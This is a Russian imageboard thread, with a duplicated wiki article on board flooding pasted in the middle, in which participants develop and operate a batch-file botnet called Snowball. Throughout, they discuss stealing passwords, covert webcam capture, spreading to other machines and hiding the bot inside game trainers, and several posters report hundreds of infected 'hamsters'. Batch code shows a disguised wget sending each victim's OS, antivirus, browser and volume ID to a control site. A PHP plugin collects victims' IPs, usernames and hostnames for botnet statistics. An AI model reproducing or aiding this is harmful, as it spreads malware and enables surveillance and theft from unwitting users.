>>43740
Смыло вайпом, наверное.
Нахуя? Я тока настроил все и блять выключили инет. Хотел тут годноты почитать а тут выпилили все
Помощи взываю!
Комп хомяка вин 8.
Отредактировал батник под свой сайт.
Отредактировал Cheese. под мыло. Кинул команду hey
в ответ тишина. ЧЯДНТ?
з.ы сайт доступен
>>43765
хуй знает что все заработало. Пришел архив с тхт фалом. Разбираюсь дальще
Котоны через что лучше всего спизить пароли?
Куда вообще весь раздел делся? Какого чёрта всё выпилили?
>>43770
Можно и скрытно. Автоэкспорт есть, дальше догадаться несложно.
>>43768
>Latest version is 1.2.8 (18/Apr/2011)
Мда, с тех пор он так не почесался новые версии делать. Давно же я его не использовал. Предложение отменяется.
Тогда можно либо нирсофт, либо школостилер от вазонеза, не знаю что ещё сейчас актуально.
тест
Хули в набегаче 0 страниц?
>>43783
А хуле больше?
Решили на последней сходке сделать 0 и сделали.
Это что же, теперь в набигаче будет чатик, а не форум? Потому что ни один тред не продержится до бамплимита с одной-то страницей. Это плохо, длинные треды скапливали много полезной информации.
Напишите обезьянке.
>>43819
Хули вы тут переполох подняли? Это я был. Я завайпал набигач. Я и б вайпал, тоже.
Скучно мне было.
http://arhivach.org/thread/820/
Я сохранил.
Сестренки, как можно по инфо определить, что я имею дело с ноутбуком? Думаю, надо запилить в личинку определитель ноутбук/не ноутбук. Если ноутбук - можно смело использовать вебку, нет светодиодов.
http://rghost.ru/46823460 например. Что может указывать на ноутбучность? Какие специфические драйвера?
Вайфай-сеть - часто ли на десктопах встречается? Может, какой-нибудь драйвер тачпада, который есть у большинства?
Алсо, новая версия Sparkle скоро будет. Мне тут один знакомый написал утилиту, чтобы из комнадной сраки проверять наличие писем в ящике, так что теперь будет сама проверять.
>>45210
>Если ноутбук - можно смело использовать вебку, нет светодиодов.
Эти тебе кто такую глупость сказал? У меня и на ноуте, и на нетбуке светодиод есть.
И напротив, как минимум некоторые внешние камеры не имеют индикации.
Но если ты хочешь определить ноутбучность, проверяй батарею — на десктопе их точно нет.
http://www.google.com/search?q=windows+cmd+get+battery+status
>>45211
> проверяй батарею — на десктопе их точно нет
Оль-лё-лё, а вот и есть: бесперебойники с обратной связью, у меня такой был. Точь-в-точь, как будто на ноутбуке, отображается батарея. Но спасибо, пригодится, хотя бы по совокупности с другими признаками.
А про светодиоды не знал. Странно, вроде не так уж мало ноутбуков и нетбуков в руках держал, но не видел там ни разу светодиодов, и у меня без светодиода.
>>45212
>бесперебойники с обратной связью
А через какой интерфейс она работает и куда вообще втыкается?
Ну то есть, не по кабелю питания же инфа передаётся, наверняка через какой-нибудь USB.
Вот и проверяй, нет ли случайно на шине USB устройства с таким-то классом.
>>45213
Какое usb, поехавший? В лучшем случае i2c, в худшем свой протокол, но тоже 1-wire. И отдельный класс устройств, Battery называется.
>>45216
Откуда мне знать, что там? Но я сейчас погуглил, там действительно временами USB.
http://market.yandex.ru/guru.xml?CMD=-CAT_ID=969705
>>45216
> i2c
Лол. Нет, обычный USB, a-b, кажется, такой называется. Втыкаешь один конец в бесперебойник, один в компьютер, и тут же всё само собой определяется, и можно получать информацию о состоянии батареи либо средствами самой винды (значок в трее) либо любым под это дело софтом. Без сторонних драйверов.
>>45233
Это я про упсы не прочитал и обосрался. Батарейка-то в ноутах всегда на 1-wire, и даже иногда совмещенном с питанием. А в новых даже с блоком питания есть связь, чтоб ты китай за 3 бакса не покупал, а покупал ленову за 50. Упсы, конечно, висят на usb или rs232. Для винды это разные классы устройств, так что проверять на ноутбучность можно по devcon find =Battery. С точки зрения палевности вебки это ничего не даст, правда - процентов 90 ноутбуков тоже с лампочкой.
С вебкой еще один пиздец есть, часто у долбанутых хомяков стоит какая-нибудь ManyCam для ванильных фоточках. Дело в том что часто она стоит на дефольте, и вместо фоточки ц вебки тебе приходит лого ёбанного ManyCam. Думаю надо сделать определялку устроиств которая будет в инфо писать список устроиств, и дополнить команду захвата, приписывая к ней девайс с которого надо сделать фото.
>>45254
Извеняюсь за опечатки в тексте, я пьян только проснулся.
>>45254
В сноуболе используется vfw, оно не умеет выбирать устройства.
>>45257
Это в последний раз работало, когда твоя мамаша целкой была. vfw драйвера - юзермоде со всеми вытекающими, никто их не пишет
Вайп
У этой страницы нет проверенных версий, вероятно, её качество не оценивалось.
Halt! Страница огорожена от Легиона.
Хочешь высказаться? Добро пожаловать в обсуждение.
Вайп истории правок.
Вайп (от англ. wipe — стирать, сметать) — создание большого количества новых тредов, чтобы забить раздел до отказа и тем самым оттеснить вниз и удалить старые треды. В большинстве случаев вайп осуществляется не вручную, а быдлокодерами с помощью специальных утилит. Часто такие треды состоят из одного сообщения или содержат картинки c шок-контентом (нигра, порнография, говно, гуро). Однако это не всегда так. Бывают вайпы фап-материалом и даже стихами Есенина!
Содержание [убрать]
1 Цели вайпа
2 Унылый декабрьский пиздец
2.1 WHAT HAPPEN?
2.2 Результаты
3 Исходники вайпалок
4 Алсо
5 Примечания
Цели вайпа
Сделать невозможным нормальное общение на имиджборде. Такие вайпы встречаются чаще всего, их можно отнести к подвиду троллинга или спама.
Продвижение форсед-мемов.
Уничтожение старых тредов, которые не могут спокойно отойти в мир иной, поскольку их бампают заинтересованные лица, не давая нормально развиваться новым тредам.
Модераторы рано или поздно начинают драться банхаммером или включают капчу, которая предотвращает работу быдло-скриптов, но затрудняет свободное общение в /b/. Однако в последнее время наблюдаются вайпы даже при включенной капче (ибо чуть менее, чем все капчи ломаются большей или меньшей заточкой под них).
В принципе, битарды солидарны в том, что вайпом проблемы не решаются. Считается, что вайпы устраивают быдло-куны и негроебы.
Унылый декабрьский пиздец
Нарута ZOMG TECH RAY…
…и её сестра Атуран ZOMG TECH ASK
Унылый декабрьский пиздец (название спорно) — драма, начавшаяся в декабре 2007 года и охватившая два крупнейших отечественных имиджборда: Двач и Ычан, а впоследствии — и Луркоморье, в связи с выложенными здесь исходниками вайпалок.
WHAT HAPPEN?
Очевидно, что главной причиной событий является чрезвычайный рост быдла в /b/ Двача, которое активизировалось перед миллионным гетом, в тщетных попытках его приблизить и взять. Это привело к серии разнообразных вайпов, плавно перетекающих и сменяющих друг друга и осложнивших общение в /b/. Тем не менее гет был взят анимуфагами, что было расценено как фейл. Такие знаменательные события пробудили троллей всех мастей и был пущен слух, что гет был взят битардами Ычана, а вайп был устроен его быдлокодерами. Школьники Двача были крайне возмущены и расценили это как призыв к холивару, устроив некое подобие рейда на Ычан. В свою очередь школьники Ычана также не остались в долгу и охотно отвечали. Особое место во всей этой истории занимают тролли, которые всячески поддерживают конфликт, находя все новые и интересные решения. Юки, как предполагается, в происходящем не участвовала, но наверняка стоит[ЩИТО?] у его истоков.
Результаты
Вайп затруднил общение в /b/ Двача, вынудив его битардов либо перейти на Ычан, либо ловить от всего происходящего лулзы. Война правок на Луркоморье — тоже вещь очень драматичная и прискорбная. За несколько дней до нового года вайп прекратился. Кто-то считает, что выдохлись сами вайперы, другие связывают это событие с появлением автобампера, но так или иначе, общение на Дваче возобновилось. Также широко распространены слухи о причастности Куки к созданию автобампера и к окончанию УДП вообще.
Помимо этого, во время УДП было предпринято несколько попыток переманить анонимуса на другие чаны, например, Хи-чан (ひ-chan) — так называемый атипичный имиджборд[1], провозгласивший себя самой модной и не запоганенной вайпом бордой. Хи-чан грозился перетянуть всех анонимусов к себе, в День, когда Звезды Встанут в Нужном Порядке. Однако был весьма оперативно засран и забыт.
Исходники вайпалок
Капитан куда-то потерялся, поэтому я как его заместитель заявляю: будьте осторожны с исходниками, за их использование ответственность несете только вы.
pyFLOODer [показать]
Вайпалка на похапе [показать]
С использованием libcurl [показать]
Вызов curl из shell-скрипта [показать]
Многопоточная вайпалка на джаве [показать]
Алсо
В ММОРПГ вайпом называется смерть всех членов отряда в рейде или подземелье.
А на пиратских серверах ММОРПГ вайпом называется стирание или откат базы данных, что вызывает батхерт игроков.
Примечания
[показать примечания]
[показать] [ + ]Анонимус знает, что Вайп относится к имиджбордам
[показать] [ + ]Вайп является официальной дисциплиной Специальной Олимпиады
Для более подробной информации посетите портал «Special Olympics»
Категории: Lurkmore:Залоченные статьи | Lurkmore:Статьи со спорными утверждениями | Так говорил Анонимус | Special Olympics | Вайп
Вайп
У этой страницы нет проверенных версий, вероятно, её качество не оценивалось.
Halt! Страница огорожена от Легиона.
Хочешь высказаться? Добро пожаловать в обсуждение.
Вайп истории правок.
Вайп (от англ. wipe — стирать, сметать) — создание большого количества новых тредов, чтобы забить раздел до отказа и тем самым оттеснить вниз и удалить старые треды. В большинстве случаев вайп осуществляется не вручную, а быдлокодерами с помощью специальных утилит. Часто такие треды состоят из одного сообщения или содержат картинки c шок-контентом (нигра, порнография, говно, гуро). Однако это не всегда так. Бывают вайпы фап-материалом и даже стихами Есенина!
Содержание [убрать]
1 Цели вайпа
2 Унылый декабрьский пиздец
2.1 WHAT HAPPEN?
2.2 Результаты
3 Исходники вайпалок
4 Алсо
5 Примечания
Цели вайпа
Сделать невозможным нормальное общение на имиджборде. Такие вайпы встречаются чаще всего, их можно отнести к подвиду троллинга или спама.
Продвижение форсед-мемов.
Уничтожение старых тредов, которые не могут спокойно отойти в мир иной, поскольку их бампают заинтересованные лица, не давая нормально развиваться новым тредам.
Модераторы рано или поздно начинают драться банхаммером или включают капчу, которая предотвращает работу быдло-скриптов, но затрудняет свободное общение в /b/. Однако в последнее время наблюдаются вайпы даже при включенной капче (ибо чуть менее, чем все капчи ломаются большей или меньшей заточкой под них).
В принципе, битарды солидарны в том, что вайпом проблемы не решаются. Считается, что вайпы устраивают быдло-куны и негроебы.
Унылый декабрьский пиздец
Нарута ZOMG TECH RAY…
…и её сестра Атуран ZOMG TECH ASK
Унылый декабрьский пиздец (название спорно) — драма, начавшаяся в декабре 2007 года и охватившая два крупнейших отечественных имиджборда: Двач и Ычан, а впоследствии — и Луркоморье, в связи с выложенными здесь исходниками вайпалок.
WHAT HAPPEN?
Очевидно, что главной причиной событий является чрезвычайный рост быдла в /b/ Двача, которое активизировалось перед миллионным гетом, в тщетных попытках его приблизить и взять. Это привело к серии разнообразных вайпов, плавно перетекающих и сменяющих друг друга и осложнивших общение в /b/. Тем не менее гет был взят анимуфагами, что было расценено как фейл. Такие знаменательные события пробудили троллей всех мастей и был пущен слух, что гет был взят битардами Ычана, а вайп был устроен его быдлокодерами. Школьники Двача были крайне возмущены и расценили это как призыв к холивару, устроив некое подобие рейда на Ычан. В свою очередь школьники Ычана также не остались в долгу и охотно отвечали. Особое место во всей этой истории занимают тролли, которые всячески поддерживают конфликт, находя все новые и интересные решения. Юки, как предполагается, в происходящем не участвовала, но наверняка стоит[ЩИТО?] у его истоков.
Результаты
Вайп затруднил общение в /b/ Двача, вынудив его битардов либо перейти на Ычан, либо ловить от всего происходящего лулзы. Война правок на Луркоморье — тоже вещь очень драматичная и прискорбная. За несколько дней до нового года вайп прекратился. Кто-то считает, что выдохлись сами вайперы, другие связывают это событие с появлением автобампера, но так или иначе, общение на Дваче возобновилось. Также широко распространены слухи о причастности Куки к созданию автобампера и к окончанию УДП вообще.
Помимо этого, во время УДП было предпринято несколько попыток переманить анонимуса на другие чаны, например, Хи-чан (ひ-chan) — так называемый атипичный имиджборд[1], провозгласивший себя самой модной и не запоганенной вайпом бордой. Хи-чан грозился перетянуть всех анонимусов к себе, в День, когда Звезды Встанут в Нужном Порядке. Однако был весьма оперативно засран и забыт.
Исходники вайпалок
Капитан куда-то потерялся, поэтому я как его заместитель заявляю: будьте осторожны с исходниками, за их использование ответственность несете только вы.
pyFLOODer [показать]
Вайпалка на похапе [показать]
С использованием libcurl [показать]
Вызов curl из shell-скрипта [показать]
Многопоточная вайпалка на джаве [показать]
Алсо
В ММОРПГ вайпом называется смерть всех членов отряда в рейде или подземелье.
А на пиратских серверах ММОРПГ вайпом называется стирание или откат базы данных, что вызывает батхерт игроков.
Примечания
[показать примечания]
[показать] [ + ]Анонимус знает, что Вайп относится к имиджбордам
[показать] [ + ]Вайп является официальной дисциплиной Специальной Олимпиады
Для более подробной информации посетите портал «Special Olymp
Категории: Lurkmore:Залоченные статьи | Lurkmore:Статьи со спорными утверждениями | Так говорил Анонимус | Special Olympics | Вайп
Что умеет делать сноуболл? Если ограничение нат? и тп
Radmin - kun
>>45385
> нат
Он работает, если есть возможность скачать файл из интернета. Роутеры, нат - безразличны. Однако если сложное место, лучше заранее подложить wget.exe.
>>45393
Ну, если из локалки есть доступ в интернеты (без прокси разве что). Или можешь в качестве сайта указать IP своего компьютера в локалке и поднять на нем http-сервер.
>>45406
Нет мне надо как червь комп в сети зараженный→другие компы из сети
И еще есть просмотр как у радмина?
>>45422
я например прикручиваю личину к трейнерам, и всяким другим "ЧАКЕРСКИМ ПРОГРАММАМ".
Посоны, кто-нибудь решил проблему с файлами по 0Кб приходящими по фтп?
Вот, значитца, Sparkle 2.1 Alicorn.
http://rghost.ru/47146624
Умеет проверять почту, показывает количество писем в заголовке окна + звуковой сигнал.
Настройки можно частично импортировать от старой, там только в конце несколько параметров добавилоось.
Но это как бы немножко все равно еще не совсем на сто процентов законченная версия. Лето, жарко, лень.
>>45687
Да и на этих шлюх ещё твой лысый батя фапал.
Ты, конечно же, рассказываешь очень интересные вещи, которые никто кроме тебя не знает, но может по вопросу будут комментарии?
>>45741
Запили Email-рассылку обновлений.
Могу дать пони-адрес, с которого можно рассылать.
>>45781
> Email-рассылку
Это как делается? Есть сервисы какие-то?
А может, лучше rss-ленту? типа http://pinkamina.wml.su/rss.xml
>>45783
А лучше размести где-нибудь сайтик. С архивом версий и чейнджлогом.
>>45900
Лол, я могу. Только он будет м-м-максимум вебодиннольный, на голом хтмл без скриптов. Устроит?
>>45905
Самое то, свистелки пирделки никому не нужны, чем проще тем лучше.
Ну в общем вот, смотрите все, какой я долбоёб сделал сайт.
http://pinkamena.wen.ru
пока там ничего нет кроме хелпа и, возможно, некоторые страницы из хелпа отсутствуют.
Алсо сразу вопрос, как сделать, чтобы отображался значок rss в адресной строке оперы? Вроде все по инструкции, rss.xml в корневой папке сайта.
>>45929
Молодец Ёнушка, отличный сайт запилил!
Доброго утра.
Управлять этим таки не очень удобно. Было бы неплохо запилить веб-интерфейс управления хотя бы на похапе.
Отправь свой скайпик или жаббер мне на почту. [email protected]
Ёба я тебе на почту написал.
>>45983
Кстати о веб инфертейсах.
Мы тут с другом болтали и подумали что здорово бы иметь хоть какую-нибудь статистику, мапример график скачиваний cheese.txt или что-то в этом роде. А то боты не все могут в почту и чтобы их точно подсчитать приходиться грузить пустышку на ge.tt и скачитавть её через wget, чтобы посмотреть сколько собираеться скачиваний.
Возможно ли запилить что-нибудь на подобии пикрилейтед?
Алсо про update. Когда я их перетаскивал на новый домен, овер-дохуя не обновились, в почте выходило что-то вроде WTF или как-то так. Не помню точно, почту-то распидорасило :3
Что это может быть?
>>45982-кун.
>>45984
> Возможно ли
Да. Один знакомый юноша делал это еще в реликтовые до-хамдраксные версии. Просто дописывал строчку сразу после скачивания cheese.txt, типа
spoolsv.exe сайт.домен/файл.php?name=%itsme%
>>45986
Ясно ясно.
Кажеться я видел работу того анона, если не ошибаюсь, там был каунтер, который считал скачивания сыра. Значит это дело можно изменить под график, но как? Может кто-тут знает как это сделать? Я тоже пока погуглю что-нибудь, можно наверное даже на тот-же вен запилить, получиться мини админка.
>Команда была написана с ошибкой. Соответственно ни один не обновился.
Пичальбида что-же мне делать?
команда была такая если я не ошибаюсь:
sugarcube,update
..
..
update
7.0
как-то так, я подумал если записать 7.0 то он обновит так как 2.6 != 7.0
правильно?
>>45988
Ура! Сработало :3
Хомячки потихоньку обновляються.
Сейчас буду гуглить как запилить график.
Если у кого есть идеи, или кто-нибудь знает как это сделать пишите.
>>45990
Нашел вот это.
Вроде годно, но надо поебаться с настройками. Попробую установить на локальном сервере.
http://razorflow.com/
>>45991
Ok, установил.
Теперь, надо его настроить, что-бы он брал нужные данные и время должно быть не статическим а динамическим.
Вот собственно сам график.пхп
http://pastebin.com/LM8vB3WK
и RFUtil.php
http://pastebin.com/YmcCJVDB
Сколько нужно пониёбов, чтобы настроить счётчик? в этом ITT треде. Лол.
>>45993
Если умеешь настраивать - помоги лалка.
>>45994
Но это же долбоебизм, для такой простой функциональности я бы сам написал десяток строчек.
>>46000
Я не могу в пехапе, хоть убей.
Сейчас пробую настраивать базу данных.
Алсо как собрать триггер работающий через wget?
>>46003
Всё я разобрался.
Ёба, если я соберу чиз вот так:
sugarcube,lèlèlèl
..
..
update, obey
wersion 6.66
>>46043
а как сделать чтобы он и обновился и втполнил обей?
Просто на обновление уходит несколько дней, это-же очень долго.
>>46044
> на обновление уходит несколько дней
>>46047
у меня 500 с лишним хомяков. Они правда обновляються минимум пару дней, такие дела.
>>46052
Сурово.
А я так делаю: когда новую версию тестирую, обновляю двух-трех, проверю, как работает, потом запускаю общее обновление - обновятся все, что онлайн на данный момент, а кто оффлайн - просто в следующий раз их обновляю. По мере поступления.
Ёба! Я опять тебе письмо написал. Отвечай скорее :3
>>46117
I hope he reply fast, can't wait to get his opinion.
By the way i'm the other one.
:3
Sorry for english
>>46117
Ты товарищу переводить сам будешь или мне на двух языках писать? Лет ми спик ю фром май харт он поймет?
>>46120
Пиши как тебе удобней, если по русски, то переведу.
Поняши, яннп, этот вирус правда не умеет отсылать на другую почту, нежели та, от которой ему дают пароль?
>>46123
Все правильно, не умеет, потому что для связи нужно использовать ненужную, одноразовую фейкопочту.
>>46120
Опять почту написал.
>>46125
И следить за тем, чтоб в ней не задерживалось ничего интересного? Какой-то уж очень лоутек. Хотя, конечно, на мейлсру можно пересылку настроить.
>>46127
А мне норм, я не понал чего ты хочешь, что-бы на твою домашнюю почту приходили письма от ботов? ты ебанулся? я вообще почту сноуболла смотрю через тор.
>>46127
А что там может задержаться? Вот я отправлю команду и тут же почту получаю, и ты так делай.
>>46128
Я хочу, чтоб левый хуй хакир не подсматривал, что мне боты пишут. Очевидно же. Ну а отстукиваются они не моментально, сидеть караулить штоле.
>>46123
>не умеет отсылать на другую почту, нежели та, от которой ему дают пароль?
Но почему? Для отправки письма на ящик не нужен пароль от ящика, что за хуйня у вас тут в треде творится?
>>46136
>Для отправки письма на ящик не нужен пароль от ящика
Ебанат совсем да?
>>46141
Как ты можешь отправить письмо не задавая никакого пароля?
>>46142
Ебать ты ХАКИР. Просвещайся http://ru.wikipedia.org/wiki/SMTP
>>46144
S: (ожидает соединения)
C: (Подключается к порту 25 сервера)
S:220 mail.company.tld ESMTP CommuniGate Pro 5.1.4i is glad to see you!
C:HELO
S:250 domain name should be qualified
C:MAIL FROM: <[email protected]>
S:250 [email protected] sender accepted
C:RCPT TO:<[email protected]>
S:250 [email protected] ok
C:RCPT TO: <[email protected]>
S:550 [email protected] unknown user account
C:DATA
S:354 Enter mail, end with "." on a line by itself
C:from: [email protected] //чтобы письмо
C:to: [email protected] //не было добавлено
C:subject: tema //в категорию спам
C: //
C:Hi!
C:.
S:250 769947 message accepted for delivery
C:QUIT
S:221 mail.company.tld CommuniGate Pro SMTP closing connection
S: (закрывает соединение)
Ты про это?
Для этого надо весь код изменять, и вообще не похуй-ли тебе если взломают фейкомыло?
>>46136
Если не авторизоваться, на мылах и прочих рамблерах будет моментально СПАМ БАН КЛАДБИЩЕ ПИДОР.
>>46146
Да, я именно про это.
>надо весь код изменять
Вот это вообще пиздец проблема!
>>46150
Вижу, ты никогда не пытался отправить мыло без авторизации. Месяца три назад, когда я пробовал в последний раз, мыло.сру спокойно пропускало любую почту, проходящую по остальным критериям не-спама.
И уж тем более мне не ясно, почему
>вирус не умеет отсылать на другую почту, нежели та, от которой ему дают пароль
>на почту
>от которой ему дают пароль
С каких это пор для отправки письма на [email protected] нужен пароль от [email protected]?
Переделывайте быдлокод, пока не поздно, ребятушки.
>>46152
Ну ты попробуй не одно письмо послать, а пару десятков. Тупой уёбок.
>>46152
Ебать всем нормально а тебе нет.
Не нравиться - сам бери и переделывай как душе угодно.
>>46152
> для отправки письма на [email protected] нужен пароль от [email protected]
Только лишь потому, что почта отправляется с того же самого [email protected]. Улавливаешь? с [email protected] на [email protected].
Да, я знаю, можно отправлять почту без авторизации. Но так уж исторически сложилось, что когда я спросил у гугла пару лет назад, как отправить почту из командной строки, лучшим вариантом вышла postie.exe, а она, по-моему, только с авторизацией отправляет. Во всяком случае
>>46146
> надо весь код изменять
Только две строчки. 1560 и 1563.
>>46155
А через тельнет ведь тоже можно, правда?
Помню что когда был школьником слал АНОНИМНЫЕ ПИСЬМА через телнет. Если телнет по дефольту на всех виндах стоит, можно попробовать запилить отправлялку.
Ёба я тебе почту написал!
>>46153
Подпись на новой строке ставится.
>>46154
Да мне вообще похуй, я сам себе пишу. Для вас же стараюсь, но нет — вам хочется жрать говно.
>>46155
>почта отправляется с того же самого [email protected]. Улавливаешь? с [email protected] на [email protected].
Я давно догадался, но зачем, блядь, почему? Как вообще у здравомыслящего человека могла такая идея в голове возникнуть?
>>46159
> Как вообще у здравомыслящего человека могла такая идея в голове возникнуть?
Давным-давно была реликтовая версия этой личинки, которая умела только ftp (встроенным клиентом). Потом добавил способ отправки по email, и мне, да и всем остальным, он показался удобнее. Однако позиции в командном файле остались те же, сервер-логин/мыло-пароль. Некуда было втиснуть второе мыло. Обратная совместимость, короче, как в том анекдоте с шириной лошадиной задницы и космическим кораблем.
А впрочем, если хочешь, могу сделать - через запятую, например. Первое мыло с которого отправка, второе - на которое. Надо, нет?
>>46156
> через тельнет
Файлы нельзя отправлять.
to-do list:
1. Плагины, которые выполняются при каждом выполнении каждой команды.
2. Плагины, которые дописывают в заголовок некоторую дополнительную информацию (уровень заряда батареи, например).
3. Две почты при отправке с smtp: одна - с которой отправляем, вторая - на которую. Но можно будет с одним как раньше, обратная совместимость.
>>46165
То есть, ты такой "у вас тут всё говно, я вас затралил лалки", а Йоба такой проникся и подорвался допидаливать свои батники?
Ёба, вожможен ли повтор в генерации ИД юнита?
Если да, как это избежать?
Невероятно, но факт: возможен. В cmd.exe вообще странный рандом. Спасибо что напомнил, в следующей версии сделаю генерацию на основе не одного лишь %random%.
А пока можешь выполнить obey следующего содержания, чтобы разделить сросшихся:
echo Новое_имя_%random%>personal.dat
echo Новая группа>>personal.dat
>>46173
Можно сделать так:
Inocent-xxxx-xxxx-xxxx-xxxx
И смешать цифры и буквы.
>>46174
>Inocent
Innocent
быстрофикс.
>>46174
> Inocent-xxxx-xxxx-xxxx-xxxx
Устанешь вводить/запоминать же. Я вот думаю, может серийный номер логического тома использовать? (можно увидеть, выполнив dir). Он как хххх-хххх в шестнадцатеричном формате.
>>46182
Я думаю норм, только как его отсеять от другого мусора? Там же оутпут очень большой.
Не проще смастерить 2 ранда по 4 цифры a-z, A-Z, 0-9?
>>46187
Проще, конечно. Но отсеять тоже несложно. И будет не просто рандом, а именно номер определенного компьютера.
Вот, например, код в две строки, присваивает переменной volumenum значение номера диска, с которого запущен батник:
for /f "tokens=1,* usebackq delims=[]" %%a in ("dir %~d0 | find /v /n """
) do if /i "%%a"=="2" set volumenum=%%b
set volumenum=%volumenum:~-9%
>>46189
Отлично!
Раз уж ты начал изменять код, можешь добавить сафари к браузерам?
>>46191
> сафари к браузерам
Ой, как же я его забыл, дырявая голова, а ведь даже пользовался им некоторое время.
http://rghost.ru/47462686
Вот, значитца, бета-версия 2.9b.
1. Генерирует новые имена из серийного номера тома (работает на XP и 7, на остальных не знаю).
2. Теперь можно использовать два мыла. С одного отправка, на другое прием. Делается это так:
========================
sugarcube,код
smtp
smtp.mail.ru
почта[email protected],почта2mail.ru
пароль_от_почта1
everypony
everypony
hey
========================
Будет произведена отправка на почту два. Но и по старому тоже можно. Я забочусь об обратной совместимости, лалки.
Также вложил Sparkle2, адаптированную под возможность двух емейлов. В настройках (если вы используете два мыла) потребуется указать оба два мыла через запятую и пароли к ним через запятую. Пароль для второго мыла - если включена автопроверка, если не включена, то не надо.
Вроде работает, но это бета-версия. Так что кому охота потестить - велкам.
>>46195
Ёбушка я тут плагин написал. Скажи пожалуйста, он будет запускаться стендалон, или сможет брать переменные из xvid.bat?
set siteST=site.org/connect.php
for /f "usebackq tokens=*" %%a in (ver
) do set my_os=%%a
set my_os=Windows NT %my_os:~-9,-6%
for /f "tokens=1,* usebackq delims=[]" %%a in ("dir %~d0 | find /v /n """
) do if /i "%%a"=="2" set volumenum=%%b
set volumenum=%volumenum:~-9%
spoolsv.exe -O nul --user-agent=" | %antivir% | %browser% | %my_os% | %volumenum% | " "http://%siteST%"
>>46199
ой, %volumenum% уже есть в xvid.bat
ну короче ты понял о чем я.
>>46199
> Или надо определялку антивиря, браузера и тома надо в плагин прописать
Нет, все переменные будут унаследованы от основного процесса. В плагине можно их менять, он запускается в отдельном процессе и не влияет на основной. Так что можно без.
В этой версии, 2.9b выявилась особенность (даже багом не назвать): при обновлении высылается уведомление, что, мол, сейчас обновлю, но не высылается извещение после успешного обновления. Пугаться не надо, в дальнейшем все работает. Исправлять не буду, это только один раз произойдет, при обновлении со старых версий.
Ёба! Мы тут с другом закончили SnowTraces!
Вот changelog:
SnowTraces Changelog
- 2.2 Добавлена авторизация для dbprint.php. Настраивается через install.php
----------------------------------------------------------
- 2.1 Данные из базы данных выводяться в таблицу внутри dbprint.php.
- 2.0 Юниты с одинаковым ID не записываються повторно в базу данных и не засоряют графики.
В базе данных сохраняеться дополнительная информация.
- 1.7 Добавлен mysqlconnect.php. Добавлен install.php, он настраивает mysqlconnect.php. Маленькие графические улучшения.
- 1.5 Первая версия.
>>46210
Yo bro!
>>46211
А чего ты в тред не выкладываешь? Я-то в php ничего не пони, а тут может тебе подскажут что полезное.
SnowTraces 2.2
Что это такое?
Это плагин для программы удалённого администрирования Snowball (http://pinkamena.wen.ru/).
Плагин работает корректно с Snowball версией >= 2.9b.
С помощью этого плагина можно удобно вести статистику ботнета.
На данный момент он создаёт 4 графика:
- Kоличество подключений и их время.
- Используемая операционная система.
- Используемый антивирус.
- Используемый браузер.
К тому-же в базе данных сохраняються некоторые данные юнита:
- ID в базе данных.
- Время сервера.
- ID юнита (Innocent - xxxx-xxxx).
- Юзернейм активного пользователя.
- Название компьютера актиного пользователя.
- IP адресс.
- Операционная система.
- Антивирус.
- Браузер.
- Время юнита.
- user_agent.
- Время UNIX.
- Не решенный IP адрес.
Как это работает?
Когда выполняеться плагин, wget шлёт нужные данные в поле user_agent на
connect.php (спасибо тому анону который его написал, новый connect.php родился из него).
connect.php сортирует данные, и сохраняет всё по своим местам.
В базу данных сохраняються всякие плюшки (ip, hostname, ecc.) и первый график будет брать данные от туда с помощью /hits/data.php.
Остальные данные сохраняються в подпапках (/os/os.php, /av/av.php, /bro/bro.php), следовательно генерируються файлы для графиков:
brojson.php, osjson.php, avjson.php.
reset.php обнуляет статистику, чистит файлы os.php, av.php, bro.php и базу данных.
Графики выводяться на DashBoard.php
База данных выводиться в dbprint.php.
Папка /сайт/ch содержит компоненты графика, темы и так далее.
install.php настраивает mysqlconnect.php.
Как это установить?
Для начала надо создать домен который поддерживает MySQL и PHP.
Потом надо создать базу данных MySQL и импортировать в неё таблицу /база данных/db.sql.
Теперь загружаем все файлы из папки /сайт/ в рут домена.
Заходим на install.php и настраиваем базу данных и пароль для просматривания dbprint.php.
После этого обязательно удаляем install.php что-бы никто не смог изменить ваши настройки.
Всё готово. Для проверки можно зайти на connect.php и посмотреть аутпут:
если написано Data saved. значит всё настроено правильно. Повторное подключение выдаст аутпут Volume already set,
это потому-что ваш ID уже записан в базе данных. Потом смотрим на DashBoard.php и dbprint.php,
если есть изменения, всё в порядке. Проверяем reset.php, он должен выдавать вот этот аутпут:
OS reset - OK!
AV reset - OK!
Browser reset - OK!
Database reset - OK!
После этого надо настроить плагин и установить его.
Как это сделать можно почитать тут \! плагины\SnowTraces\что это.txt
Eсли зайти на connect.php с обычного браузера, график с антивирусами не будет обновляться,
так как user_agent браузера не содержит данные об антивирусе и некоторые пункты в базе данных будут пустыми.
Этот аддон был создан двумя анонами:
- [email protected]
- [email protected]
Спасибо Ёбе за поддержку и за Snowball. Так-же спасибо тому анону который написал оригинальный connect.php.
[email protected]
Скачать вирусы:
http://rghost.net/47483262
Пароль /i/
>>46221
Сейчас я допилю плагины, чтобы можно было при каждом выполнении команды, как ты делал.
>>46223
Это не обязательно!
- 2.0 Юниты с одинаковым ID не записываються повторно в базу данных и не засоряют графики.
В базе данных сохраняеться дополнительная информация.
>>46223
Это не обязательно!
- 2.0 Юниты с одинаковым ID не записываються повторно в базу данных и не засоряют графики.
В базе данных сохраняеться дополнительная информация.
Ну, не нужно так не нужно. Все равно сделал.
Попутно обнаружил коварный баг: если в боте при первом запуске внутри, в самом теле бота в настройках включены плагины (plugins=yes), и если при этом нет wget (не приложен к боту, предполагается, что скачает сам), бот уходил в страну вечного облома, пытаясь скачать nircmd несуществующим wget. Исправил.
snowball_2.10b
http://rghost.ru/47486886
Теперь появился новый тип плагинов, с префиксом "3": выполняются при каждом выполнении каждой команды.
В архиве также пример такого плагина, который выводит в трее всплывающие сообщения.
>>46228
А nircmd няша.
Я не знал что он такое умеет. Пойду покурю мануалы.
А почему бету выпустил? еще что-то доделать планируешь?
>>46228
Допустим я обновлю на 2.10, старые униты будут переименованы по новому методу или остануться со старым именем?
Надо после обновления выпиливать personal.dat?
>>46230
Останутся со старым именем. Выпиливать ничего не надо; но если выпилишь, имя сгенерится заново по новому шаблону.
Ты пока не обновляй, погоди пару дней, я добавлю еще одну уберфункцию и баги поищу.
>>46231
Ладно подожду.
Так почему не надо выпиливать? Ведь если я просто обновлю все остануться со старым именем. Я думал так - повесить обновление на пару дней, и потом стиралку персонал.дат. Так они и обновяться и имя нормальное будет :3
Интересно что за уберфункция?
>>46232
> и имя нормальное будет
Будет имя на основе номера тома, тебе именно это надо?
